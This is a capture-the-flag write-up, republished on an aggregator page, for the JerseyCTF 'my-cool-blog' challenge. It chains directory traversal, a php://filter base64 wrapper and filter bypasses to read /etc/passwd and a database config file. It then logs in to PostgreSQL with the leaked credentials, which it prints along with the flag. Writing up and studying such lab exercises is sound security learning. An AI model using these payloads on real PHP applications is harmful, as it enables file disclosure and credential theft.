Fetching latest headlines…
my-cool-blog - jerseyctf6
NORTH AMERICA
πŸ‡ΊπŸ‡Έ United Statesβ€’April 19, 2026

my-cool-blog - jerseyctf6

0 views0 likes0 comments
Originally published byDev.to

Challenge Overview

This challenge involves chaining multiple vulnerabilities β€” Directory Traversal, Local File Inclusion (LFI), and a PHP filter bypass β€” to extract database credentials and retrieve the flag directly from a PostgreSQL database.

Key concepts: LFI, Directory Traversal, PHP filter wrapper, Base64 bypass, PostgreSQL enumeration

Step 1 – Reconnaissance

The challenge URL exposes a suspicious file parameter:

http://my-cool-blog.aws.jerseyctf.com/view-post.php?file=posts/cool-post-1

Landing page

Run an nmap scan to fingerprint the target:

nmap -sV my-cool-blog.aws.jerseyctf.com

Target scan

Port Service Version
22 SSH OpenSSH 8.7
80 HTTP Apache 2.4.63 Ubuntu
5432 PostgreSQL DB 18.0–18.2

The infrastructure is hosted on AWS EC2, confirmed by the reverse DNS record. Port 5432 being publicly accessible is an immediate red flag.

Step 2 – Confirm LFI via Directory Traversal

Passing an invalid path to the file parameter triggers a verbose PHP error:

PHP error disclosure

This leaks two critical details β€” the app passes user input directly to file_get_contents(), and the absolute server path is /opt/server/. Verify LFI by reading /etc/passwd:

?file=../../../../etc/passwd

LFI confirmed

Confirmed. We have LFI.

Step 3 – Enumerate the Source Code

Use the PHP Base64 filter wrapper to read view-post.php without the server executing it:

?file=php://filter/convert.base64-encode/resource=view-post.php

Decoded source code

Decoding the Base64 output reveals two security checks:

  1. Directory block β€” blocks any input starting with includes
  2. Content filter β€” blocks any file whose contents contain the string pg_connect

The developer even Base64-encoded pg_connect within the source itself (cGdfY29ubmVjdA==) to obscure the check β€” a textbook security through obscurity mistake.

Step 4 – Bypass the Filters and Extract Credentials

Both filters collapse under the same PHP filter wrapper trick:

  • The includes/ block only checks if input starts with includes β€” php:// bypasses it entirely
  • The pg_connect content filter never fires because the file is Base64-encoded in memory before str_contains can inspect it

Winning payload:

?file=php://filter/convert.base64-encode/resource=includes/db.inc

Decode the returned Base64 to reveal the PostgreSQL credentials:

host=my-cool-blog.aws.jerseyctf.com
dbname=blog
user=blog_web
password=oPPNQ9vkMdAJx

Step 5 – Connect to PostgreSQL and Dump the Flag

Connect directly to the remote database:

psql -h my-cool-blog.aws.jerseyctf.com -U blog_web -d blog

List the tables:

\dt

Query the flag table:

SELECT * FROM flag;

Flag retrieved

Flag 

jctf{EgdbFYxQi4zmD5oovBpG7F5RJqRb7Tnd}

Pwnsome References

Comments (0)

Sign in to join the discussion

Be the first to comment!

πŸ‡ΊπŸ‡Έ

United States

NORTH AMERICA

More news from United States

Related News

What Does "Building in Public" Actually Mean in 2026?

What Does "Building in Public" Actually Mean in 2026?

19h ago

The Agentic Headless Backend: What Vibe Coders Still Need After the UI Is Done

The Agentic Headless Backend: What Vibe Coders Still Need After the UI Is Done

19h ago

Why I’m Still Learning to Code Even With AI

Why I’m Still Learning to Code Even With AI

21h ago

I gave Claude a persistent memory for $0/month using Cloudflare

I gave Claude a persistent memory for $0/month using Cloudflare

1d ago

NYT: 'Meta's Embrace of AI Is Making Its Employees Miserable'

NYT: 'Meta's Embrace of AI Is Making Its Employees Miserable'

1d ago

View all NORTH AMERICA news β†’